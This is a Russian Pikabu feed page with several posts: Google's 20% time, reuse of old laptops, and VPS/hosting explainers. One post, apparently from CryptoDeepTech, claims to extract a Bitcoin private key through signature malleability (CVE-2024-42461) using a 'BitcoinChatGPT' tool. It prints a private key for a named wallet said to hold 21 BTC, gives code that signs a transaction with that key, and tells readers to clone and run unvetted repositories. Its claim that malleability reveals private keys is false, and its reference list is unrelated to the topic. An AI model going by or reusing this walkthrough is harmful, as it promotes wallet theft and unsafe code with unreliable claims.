Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Стань частью фэнтези мира! Создай своего мага и погрузись в мир мощных тактических сражений. Оттачивай свое мастерство в онлайн битвах. Всё это в «Битве Магов»!

Битва Магов

Хардкорные, Мидкорные, Ролевые

Играть

Топ прошлой недели

  • AlexKud AlexKud 38 постов
  • Animalrescueed Animalrescueed 36 постов
  • Oskanov Oskanov 7 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
7
mrkuznetsov
mrkuznetsov
7 месяцев назад
Молодые предприниматели

Google's 20% Time - инновационный подход к управлению временем сотрудников⁠⁠

Google's 20% Time - это революционная концепция управления временем и инновациями, которая изменила подход к работе в технологической индустрии. Давайте разберемся, почему эта методология стала легендарной и как она работает на практике.

Google's 20% Time - инновационный подход к управлению временем сотрудников Развитие, Бизнес, Предпринимательство, Стартап, Google, Малый бизнес, Рекомендации, Менеджмент, Управление, Инновации, Длиннопост

Что такое Google's 20% Time в двух словах

Суть концепции предельно проста: каждый сотрудник Google может тратить 20% своего рабочего времени (это примерно один день в неделю) на проекты, которые напрямую не связаны с его основными обязанностями. Единственное условие - проект должен потенциально принести пользу компании. Никаких других ограничений нет. Полная свобода творчества и инициативы.

Основные фичи концепции Google's 20% Time

✅ Это не просто hr-программа, а часть корпоративной культуры. 20% времени - это право каждого сотрудника, а не привилегия избранных.

✅ Нет бюрократии и согласований. Сотрудник сам решает, над чем работать, и не должен получать предварительное одобрение.

✅ Акцент на практической реализации. Важен не сам процесс генерации идей, а создание работающих прототипов и решений.

Как это работает на практике

Реализация 20% Time в Google выглядит примерно так:

1. Сотрудник выбирает проект, который его действительно вдохновляет. Это может быть что угодно, от улучшения существующего продукта до создания совершенно нового.

2. Он может работать над проектом самостоятельно или собрать команду единомышленников, также использующих свое "свободное" время.

3. Никаких формальных отчетов не требуется. Успех измеряется реальными результатами, например, работающим прототипом, решенной проблемой, улучшенным процессом.

4. Если проект показывает перспективы, он может перерасти в полноценный продукт компании.

⭐ Успешные кейсы

📧 Gmail

Пожалуй, самый известный продукт, родившийся из 20% Time. Пол Бухайт, инженер Google, использовал свое свободное время для создания веб-почты нового поколения. Он считал, что существующие решения недостаточно удобны и функциональны. Gmail произвел революцию в мире электронной почты, предложив гигабайты места для хранения и инновационный интерфейс.

📰 Google News

Кришна Бхарат был потрясен недостатком информации после событий 11 сентября 2001 года. Используя свое 20% время, он разработал агрегатор новостей, который автоматически собирал и систематизировал новости из разных источников. Сегодня Google News - один из крупнейших новостных агрегаторов в мире.

🗺 Google Maps

Первоначальная версия карт Google также появилась благодаря 20% Time. Группа инженеров считала, что существующие картографические сервисы слишком сложны и неудобны. Они создали прототип того, что позже превратилось в Google Maps - сервис, которым сегодня пользуются миллиарды людей.

🏆 Влияние на индустрию

20% Time оказал огромное влияние на технологическую индустрию:

- LinkedIn внедрил программу "InCubator", где инженеры могут тратить до 3 месяцев на реализацию своих идей.

- Apple создала "Blue Sky", предоставляя избранным сотрудникам время на собственные проекты.

- Microsoft запустила "Garage", где сотрудники могут работать над инновационными проектами.

⚠️ Почему это работает?

Успех 20% Time базируется на нескольких ключевых принципах:

✅ Автономия. Сотрудники чувствуют себя хозяевами своего времени и идей.

✅ Мастерство. Возможность развивать навыки в интересующих областях.

✅ Цель. Работа над проектами, которые могут изменить мир к лучшему.

20% Time - это не просто способ организации рабочего времени. Это философия доверия к сотрудникам и вера в то, что инновации могут прийти от каждого члена команды, независимо от его должности или отдела.

P.S. Если вам интересны подобные истории об инновационных подходах в управлении и развитии бизнеса, подписывайтесь на мой телеграм-канал Записки продакт-менеджера. Там регулярно появляются новые материалы о методологиях, кейсах и трендах в разработке продуктов и менеджмента.

Показать полностью 1
[моё] Развитие Бизнес Предпринимательство Стартап Google Малый бизнес Рекомендации Менеджмент Управление Инновации Длиннопост
5
VUMIX98
VUMIX98
8 месяцев назад

Для чего использовать старый ноутбук!⁠⁠

Использование старого ноутбука может быть полезным по нескольким причинам:

1. Резервное устройство: Старый ноутбук может служить как запасное устройство в случае поломки или временного недоступности основного компьютера. Это обеспечит вам доступ к работе и интернету даже в случае проблем с основным устройством.

2. Обучение и тестирование: Вы можете использовать старый ноутбук для обучения новым навыкам, программированию, тестированию программного обеспечения или экспериментов с операционными системами без риска повредить основное устройство.

3. Медиа-центр или сервер: Старый ноутбук можно превратить в медиа-центр для потокового просмотра фильмов и музыки на телевизоре или использовать как домашний сервер для хранения файлов и резервного копирования данных.

4. Игры и развлечения: Если ваш старый ноутбук способен запускать игры, вы можете использовать его для игровых сессий или развлечений, освобождая основное устройство от лишней нагрузки.

5. Донорные детали: Если у вас есть другие устройства той же модели, вы можете использовать старый ноутбук как источник донорных деталей для ремонта или модернизации других устройств.

6. Экологичность: Повторное использование старого ноутбука помогает уменьшить количество электронного мусора и способствует экологической устойчивости.

Таким образом, старый ноутбук может быть полезным как дополнительное устройство для различных целей, обеспечивая вам дополнительные возможности и выгоды.

[моё] Технологии Инновации Google Инженер Тренд Программа Изобретения Тестирование Стартап Текст
9
0
CryptoDeepTech
CryptoDeepTech
9 месяцев назад

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3]⁠⁠

В первой части статьи мы провели большое исследование уязвимости Signature Malleability, угрожающей безопасности популярных криптовалют, таких как Bitcoin и Ethereum. Во второй части статьи мы рассмотрели на реальном примере механизмы эксплуатации CVE-2024-42461 в библиотеке Elliptic для ECDSA, используя биткоин-кошелек 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw, на котором были потеряны монеты на сумму 21.2529214 BTC, что на ноябрь 2024 года составляет 1,744,572.51 USD. В этой третьей части статьи мы рассмотрим методы поиска уязвимости Signature Malleability, как предотвращение угрозы для собственного криптовалютного кошелька Bitcoin и Ethereum мы можем воспользоваться и применить на примерах различных методов машинного обучение.

Воспользуемся списком из “Tutorials Power AI” широко применяемая категория искусственного интеллекта для введение бизнеса в различных сферах деятельности криптоанализа и крипографии в целом.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Команда установки:

git clone https://github.com/demining/Tutorials-Power-AI.git

cd Tutorials-Power-AI/

python tutorials.py

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

BitcoinChatGPT — это инновационный чат-бот на базе искусственного интеллекта, который помогает пользователям находить уязвимости в транзакциях криптовалюты Bitcoin. Преимущества и классификации BitcoinChatGPT дают возможность проверить ваш адрес Bitcoin на предмет различных схем атак на криптокошельки. Машинное обучение на основе криптоанализа дает нам полную возможность исследовать различные атаки на алгоритмы, используемые в экосистеме Bitcoin. Инструменты для извлечения приватого ключа из реестра Bitcoin Wallet широко популярны, где BitcoinChatGPT служит важным и полезным ресурсом для кибербезопасности.

Применим уязвимость CVE-2024-42461: Signature Malleability в библиотеке Elliptic для создания Raw транзакции с помощью процесса машинного обучение BitcoinChatGPT

Рассмотрим построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

Откроем версию Google Colab:

https://colab.research.google.com/drive/1YGZiPtgY0vPQ3PwUvbAjQW8LcErVHRsT

State of a vulnerable transaction in Bitcoin: 01000000 ....01 ........0dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935 ............00000000 ........8b483045 ....0221 ...........00 ...........97255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe0 ....0220 ........1014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d5 .....0141 .....049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461 ....ffffffff 01 ....d204000000000000 ........1976 ............a914 ........d77522a2b18e0064aba02ca7f864a5bb22998259 ....88ac 00000000

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Соединим все выданные значение в одну общую строку с помощью Python-скрипта combinex.py:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000

Откроем опцию от BlockCypher «Decode A Transaction»:

https://live.blockcypher.com/btc/decodetx/

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

После декодирование уязвимой Raw транзакции Биткоина мы получаем результат:

{ "addresses": [ "1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK", "1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw" ], "block_height": -1, "block_index": -1, "confirmations": 0, "double_spend": false, "fees": 2606688996428, "hash": "a5828ec5775b967c36ab5c6a0184aaa52fd64e6650d07287cc7688266c6dbb28", "inputs": [ { "addresses": [ "1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK" ], "age": 344419, "output_index": 0, "output_value": 2606688997662, "prev_hash": "35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d", ....... ....... .......

Обратим внимание на Bitcoin HASH160: d77522a2b18e0064aba02ca7f864a5bb22998259

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

https://github.com/demining/CryptoDeepTools/blob/dfc7da9a6b41d72253bfcb6ae6da2718de7d9b87/36SignatureMalleability/DecodeRawTX.txt#L31

Transaction Script

The above script has been decoded

BitcoinChatGPT создает структуру транзакции, используя HASH публичного ключа, где мы видим что Bitcoin address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw отправляет 1234 satoshi на тот же адрес внутри своей сети.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Bitcoin HASH160 был получен с помощью Python Script: wif_to_hash160.py

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

d77522a2b18e0064aba02ca7f864a5bb22998259

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

https://github.com/demining/CryptoDeepTools/blob/main/36SignatureMalleability/wif_to_hash160.py

Вопрос — Ответ:

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост
Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост
Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

В конечном итоге модуль BitcoinChatGPT выдает ответ в файл: KEYFOUND.privkey сохранив приватный ключ в двух наиболее используемых форматах HEX & WIF

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

https://github.com/demining/CryptoDeepTools/blob/main/36SignatureMalleability/KEYFOUND.privkey

============================= KEYFOUND.privkey ============================= Private Key HEX: 0x17e96966f15a56993e13f8c19ce34a99111ad768a051d9febc24b6d48cae1951 Private Key WIF: 5HzpNjEsxrpxPFqBKaoRSnFeq7RP57mvzwgoQFVtAJNZBpLVyur Bitcoin Address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw Balance: 21.25292140 BTC ============================= KEYFOUND.privkey =============================

BitcoinChatGPT №5 Signature Malleability Vulnerability Algorithm

Уязвимая Raw транзакция

Создадим из полученных данных уязвимую Raw транзакцию используя репозиторию Broadcast Bitcoin Transaction

Скачаем и установим исходный код откроем терминал и запустим команду:

git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction....

Каталог:

cd Broadcast-Bitcoin-Transaction

Установим три важные библиотеки:

  • zmq

  • urllib3

  • requests

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

requirements.txt

Запустим команду:

pip install -r requirements.txt

Откроем в Notepad++ основной файл и внесем небольшие изменение в коде Python Script: main.py

from io import BytesIO from secp256k1 import * from sighash import * pk = PrivateKey.parse("5HzpNjEsxrpxPFqBKaoRSnFeq7RP57mvzwgoQFVtAJNZBpLVyur") pk.address() tx = bytes.fromhex("35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d") index = 0 send = "1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw" tx_in = TxIn(tx, index, b'', 0xffffffff) tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey'] tx_in._value = 2345 tx_ins = [ tx_in ] tx_outs = [ TxOut(1234, Tx.get_address_data(send)['script_pubkey'].serialize()) ] tx = Tx(1, tx_ins, tx_outs, 0, testnet=True) signature(tx, 0, pk) tx.serialize().hex() print(tx.serialize().hex()) f = open("RawTX.txt", 'w') f.write("" + tx.serialize().hex() + "" + "\n") f.close()

Запустим команду:

python main.py

Уязвимая транзакция создана!

Откроем файл RawTX в каталоге:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000

Порядок выполнения действий на видео:

  1. Именно эту уязвимую RawTX мы рассматривали в начале данной статьи: ↩︎

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Процесс декодирование RawTX с помощью инструмента decoderaw

Как нам известно из prompt ответов модуля BitcoinChatGPT Signature Malleability Vulnerability Algorithm может быть использован для решения сложных криптографических задач.

Заключение

Существует множество методов обнаружения и предотвращения поддельных подписей в сети Bitcoin. Эти методы варьируются от простых решений, таких как увеличение количества подтверждений, до более сложных систем анализа аномалий и регулярного обновления протоколов безопасности. Эффективная защита требует комплексного подхода к обеспечению безопасности сети и постоянного мониторинга новых угроз. Поддельные подписи могут привести к мошенническим транзакциям и потере средств. Основные методы, используемые для обнаружения и предотвращения таких атак:

1. Увеличение количества подтвержденийОдним из простейших способов защиты от поддельных подписей является увеличение количества подтверждений транзакции перед ее окончательным принятием. Рекомендуется ждать не менее шести подтверждений, чтобы снизить вероятность успешной атаки. Это позволяет убедиться в том, что транзакция была включена в блок и не может быть отменена.2. Анализ блоков и транзакцийМайнинговое ПО и узлы сети анализируют блоки и транзакции на предмет конфликтов и аномалий. Это включает проверку подписи на соответствие формату, а также проверку значений r и s на допустимые диапазоны. Если значения находятся вне допустимых пределов, транзакция может быть отклонена.3. Внедрение систем анализа аномалийИспользование систем анализа аномалий позволяет выявлять подозрительные транзакции и цепочки блоков. Эти системы могут использовать алгоритмы машинного обучения для обнаружения необычного поведения в сети, что может указывать на попытки подделки подписей.4. Программное обеспечение для мониторинга сетиИнструменты, такие как Wireshark, могут быть использованы для анализа сетевого трафика и выявления подозрительных активностей. Мониторинг сетевого трафика позволяет выявлять атаки типа «Sybil» или «Eclipse», которые могут быть использованы для манипуляции с транзакциями.5. Регулярное обновление протоколов безопасностиРегулярное обновление программного обеспечения и протоколов безопасности помогает устранить известные уязвимости, такие как уязвимость DeserializeSignature, которая позволяет злоумышленникам создавать недействительные подписи. Обновления должны включать исправления для всех известных уязвимостей и улучшения безопасности.6. Многоуровневое подтверждениеИспользование нескольких уровней подтверждения транзакций может повысить безопасность сети. Это может включать дополнительные проверки со стороны узлов или использование сторонних сервисов для верификации подписей.

References:

  1. Odlyzko, Andrew; te Reile, Herman J. J. «Disproving Mertens Conjecture» Journal für die reine und angewandte Mathematik

  2. D. Simon (2007). «Selected applications of LLL in number theory» LLL+25 Conference. Caen, France.

  3. Regev, Oded. «Lattices in Computer Science: LLL Algorithm» New York University. Retrieved 1 February 2019.

  4. Silverman, Joseph. «Introduction to Mathematical Cryptography Errata» Brown University Mathematics Dept. Retrieved 5 May 2015.

  5. Bosma, Wieb. «4. LLL» Lecture notes. Retrieved 28 February 2010.

  6. Abderrahmane, Nitaj. Cryptanalysis of NTRU with two public keys // International Association for Cryptologic Research. — Caen, France.

  7. Bleichenbacher, Daniel and May, Alexander. New Attacks on RSA with Small Secret CRT-Exponents // International Association for Cryptologic Research. — Darmstadt, Germany.

  8. Xinyue, Deng. An Introduction to LLL Algorithm // Massachusetts Institute of Technology.

  9. Liu, Jiayang, Bi, Jingguo and Xu, Songyan. An Improved Attack on the Basic Merkle–Hellman Knapsack Cryptosystems // IEEE. — Beijing 100084, China.

  10. Lattice algorithms using floating-point arithmetic // The FPLLL development team. FPLLL, a lattice reduction library. — 2016.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/wf6QwCpP3oc

Video tutorial: https://dzen.ru/video/watch/674116440bddfa35d730ca7a

Источник: https://cryptodeeptool.ru/signature-malleability

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост
Показать полностью 16 3
[моё] Криптовалюта Стартап Инновации Информационная безопасность Технологии Чат-бот Google Тренд Программа Тестирование Видео YouTube Длиннопост
3
0
antony12rus1990
antony12rus1990
10 месяцев назад
Серия IT ВСЕ О VPS-VDS

Что нужно знать при аренде VPS⁠⁠

Что нужно знать при аренде VPS Технологии, Инновации, Инженер, Стартап, Информационная безопасность, Тестирование, Чат-бот, Программа, Изобретения, Google

Аренда VPS (Virtual Private Server) становится все более популярной среди пользователей, которым требуется надежный и гибкий сервер для различных задач. Это может быть размещение веб-сайтов, разработка программного обеспечения или тестирование приложений. В данной статье мы рассмотрим ключевые моменты, которые нужно учитывать при аренде VPS, а также важные технологии, такие как VPN и OpenVPN.

## Что такое VPS?

VPS — это виртуальный выделенный сервер, который предоставляет пользователям полный контроль над своей средой. В отличие от общего хостинга, где ресурсы сервера делятся между многими пользователями, VPS предлагает выделенные ресурсы, что обеспечивает большую стабильность и производительность.

## Операционные системы

При выборе VPS необходимо определиться с операционной системой. Наиболее популярными вариантами являются Linux и Windows. Linux-серверы, такие как Ubuntu или CentOS, часто используются для веб-разработки и хостинга, благодаря своей гибкости и низким затратам. Windows VPS, в свою очередь, может быть предпочтительным выбором для приложений, требующих Windows-среды.

## Доступ к серверу

При аренде VPS вы получаете доступ к серверу с правами root. Это означает, что вы можете настраивать сервер под свои нужды, устанавливать необходимые приложения и управлять безопасностью. Однако важно помнить, что с этой свободой приходит и ответственность за управление сервером.

## Хранение данных

При выборе VPS также стоит обратить внимание на тип хранилища. SSD (твердотельные накопители) обеспечивают более высокую скорость работы по сравнению с традиционными HDD. Это особенно важно для приложений, требующих высокой производительности, таких как базы данных и веб-сайты с большим трафиком.

## Сетевые технологии

Для обеспечения безопасности и конфиденциальности данных многие пользователи выбирают использование VPN (Virtual Private Network). Это позволяет создать защищенное соединение между вашим устройством и сервером, что особенно актуально при работе с чувствительной информацией. OpenVPN — это один из самых популярных протоколов для настройки VPN, который обеспечивает высокий уровень безопасности и простоту в использовании.

## Пинг и производительность

При аренде VPS важно учитывать время отклика (пинг). Низкий пинг означает более быструю реакцию сервера на запросы, что критически важно для пользователей, ожидающих мгновенного доступа к ресурсам. Перед арендой VPS рекомендуется протестировать пинг до сервера, чтобы убедиться в его надежности и производительности.

## Заключение

Аренда VPS предоставляет множество преимуществ, включая гибкость, контроль и производительность. Выбор между Linux и Windows, типом хранилища, а также использование технологий, таких как VPN и OpenVPN, могут существенно повлиять на эффективность вашего сервера. Не забывайте также проверять пинг и другие параметры производительности, чтобы обеспечить стабильную работу ваших приложений и сайтов. Следуя этим рекомендациям, вы сможете выбрать надежный VPS, который будет отвечать всем вашим требованиям в сфере IT.

https://vpsdedic.ru

Показать полностью
Технологии Инновации Инженер Стартап Информационная безопасность Тестирование Чат-бот Программа Изобретения Google
1
antony12rus1990
antony12rus1990
10 месяцев назад
Серия IT ВСЕ О VPS-VDS

Что такое хостинг простыми словами⁠⁠

Что такое хостинг простыми словами Инновации, Технологии, Стартап, Инженер, Информационная безопасность, Сервер, VPS, Linux и Windows, Хостинг, Бесплатный хостинг, Чат-бот, Программа, Тестирование, Google, Тренд, Изобретения, Длиннопост

### Введение

Хостинг — это услуга, которая позволяет размещать веб-сайты и приложения в Интернете. Простыми словами, хостинг предоставляет место на сервере, где хранится информация о вашем сайте. Чтобы ваш сайт был доступен пользователям, нужно подключить его к интернету. Давайте рассмотрим несколько аспектов хостинга и его видов, чтобы понять, что это такое.

### Как работает хостинг?

Когда вы создаете сайт, создается множество файлов: текст, изображения, базы данных и другие данные. Эти файлы должны быть доступны в любое время для пользователей, которые хотят посетить ваш сайт. Хостинг позволяет вам хранить все эти файлы на сервере, который подключен к интернету 24/7.

Серверы могут работать на различных операционных системах, таких как Windows или Linux. Linux является наиболее популярной ОС для веб-хостинга благодаря своей стабильности и безопасности.

### Разновидности хостинга

Существует несколько типов хостинга, которые могут удовлетворить различные потребности пользователей. Рассмотрим основные из них.

#### 1. Виртуальный хостинг

Это самый простой и дешевый способ разместить свой сайт. Вы делите один сервер с другими пользователями. Это подходит для небольших сайтов и блогов.

#### 2. VPS (Virtual Private Server) и VDS (Virtual Dedicated Server)

VPS и VDS предоставляют больше ресурсов и контроля, чем виртуальный хостинг. На вашем виртуальном сервере будет выделенная часть ресурсов, что позволяет настроить его по вашим требованиям. Вы можете использовать SSH для удаленного подключения и управления сервером. Это особенно полезно для разработчиков и более крупных сайтов, которым требуется больше гибкости.

#### 3. Выделенный сервер

В этом случае вы получаете полный контроль над сервером, который выделен только вам. Это идеальный выбор для больших проектов, требующих высокой производительности и надежности. Вы можете устанавливать любую операционную систему, любые приложения, использовать FTP для передачи файлов и многое другое.

### Технологические аспекты хостинга

При выборе хостинга стоит обратить внимание на технологии, с которыми он работает.

#### SSD и HDD

Существует два основных типа дисков, на которых могут размещаться ваши данные: SSD и HDD. SSD (Solid State Drive) быстрее, надежнее и производительнее, чем традиционные HDD (Hard Disk Drive). Если ваш сайт требует высокой скорости загрузки, стоит рассмотреть хостинг на базе SSD.

#### Bash и SSH

Если вы выбрали VPS или выделенный сервер, вам, возможно, придется использовать командную строку для управления сервером. Bash — это командная оболочка, которая позволяет вам выполнять команды. SSH (Secure Shell) — это протокол, который обеспечивает безопасный доступ к вашему серверу.

#### API и автоматизация

Современные хостинг-провайдеры часто предлагают API (Application Programming Interface), позволяющий автоматизировать управление вашими ресурсами. Это может существенно упростить процессы, такие как масштабирование, резервное копирование или развертывание приложений.

### Безопасность: VPN и Wireguard

Безопасность ваших данных и клиентов — важный аспект. VPN (Virtual Private Network) поможет вам защитить ваше соединение и скрыть IP-адрес, что особенно важно для более сложных проектов. Wireguard — это современный протокол для создания VPN, который славится своей простотой и высокой производительностью.

### Заключение

Хостинг — это важный элемент, необходимый для успешного функционирования вашего сайта или приложения. Независимо от того, выбираете ли вы виртуальный хостинг, VPS или выделенный сервер, важно учитывать свои потребности и требования. Понимание технологий, таких как SSD, SSH и VPN, поможет вам сделать правильный выбор и обеспечить надежность и безопасность вашего онлайн-проекта.

В итоге, обладая знаниями о различных видах хостинга и связанных технологиях, вы будете лучше подготовлены для запуска и управления своим веб-сайтом в Интернете.

https://vpsdedic.ru

Показать полностью
Инновации Технологии Стартап Инженер Информационная безопасность Сервер VPS Linux и Windows Хостинг Бесплатный хостинг Чат-бот Программа Тестирование Google Тренд Изобретения Длиннопост
8
3
antony12rus1990
antony12rus1990
10 месяцев назад
Серия IT ВСЕ О VPS-VDS

VPS и VDS: чем различаются и как выбрать?⁠⁠

VPS и VDS: чем различаются и как выбрать? Стартап, Развитие, Информационная безопасность, Инновации, IT, Тестирование, Чат-бот, Программа, Тренд, Google

В современном мире IT-услуг виртуальные серверы занимают важное место, особенно среди малых и средних предприятий, а также индивидуальных разработчиков. В этом контексте часто слышим термины VPS и VDS. Несмотря на то, что они могут показаться схожими, у них есть свои уникальные особенности. В данной статье мы рассмотрим различия между VPS и VDS, а также дадим рекомендации по выбору подходящего сервера.

## Что такое VPS и VDS?

**VPS (Virtual Private Server)** — это виртуальный частный сервер, который работает на базе физического сервера и имеет собственную операционную систему. Вы можете использовать его для различных задач: от веб-хостинга до разработки приложений. VPS технологии обычно используют гипервизоры, которые выделяют части ресурсов физического сервера.

**VDS (Virtual Dedicated Server)** — это виртуальный выделенный сервер, который обеспечивает полный доступ к ресурсам, как если бы вы использовали физический сервер. VDS предоставляет пользователю возможность управлять сервером на уровне root, обеспечивая полный контроль над системными настройками и установленными программами.

## Основные различия между VPS и VDS

1. **Ресурсы**: VPS обычно разделяет ресурсы физического сервера между несколькими пользователями, что может привести к снижению производительности при высоких нагрузках. VDS, в свою очередь, предлагает выделенные ресурсы, что обеспечивает большую стабильность и производительность.

2. **Уровень управления**: Применение VDS позволяет пользователю получить доступ на уровне root, что значительно расширяет возможности управления сервером. VPS может предоставлять менее широкий функционал в этом плане, ограничивая возможности настройки.

3. **Операционные системы**: Оба типа серверов могут работать на Windows или Linux. С помощью SSH, вы можете управлять сервером на Linux через терминал, а для Windows можно использовать RDP (Remote Desktop Protocol).

4. **Хранилище**: VPS может использовать как SSD, так и HDD, но доступные ресурсы могут быть ограничены. VDS, как правило, предоставляет больший выбор хранилищ, за счет чего возможна оптимизация производительности.

## Как выбрать между VPS и VDS?

При выборе между VPS и VDS важно учитывать несколько факторов:

1. **Потребности вашего проекта**: Если вы планируете использовать сервер для небольшого веб-сайта или приложения, то VPS может быть более чем достаточным. Однако, если у вас технично требовательный проект с высокими нагрузками, лучше выбрать VDS.

2. **Бюджет**: VPS часто дешевле, чем VDS, поэтому если у вас ограниченный бюджет, это может быть важным фактором. Однако, всегда стоит помнить, что экономия на хостинге может привести к большему количеству проблем с производительностью и отказами сервера.

3. **Уровень технических навыков**: Если вы знакомы с работой с сервером и можете использовать Bash или API для автоматизации задач, VDS предложит вам больше возможностей. Однако, если ваши навыки ограничены, возможно, стоит начать с VPS.

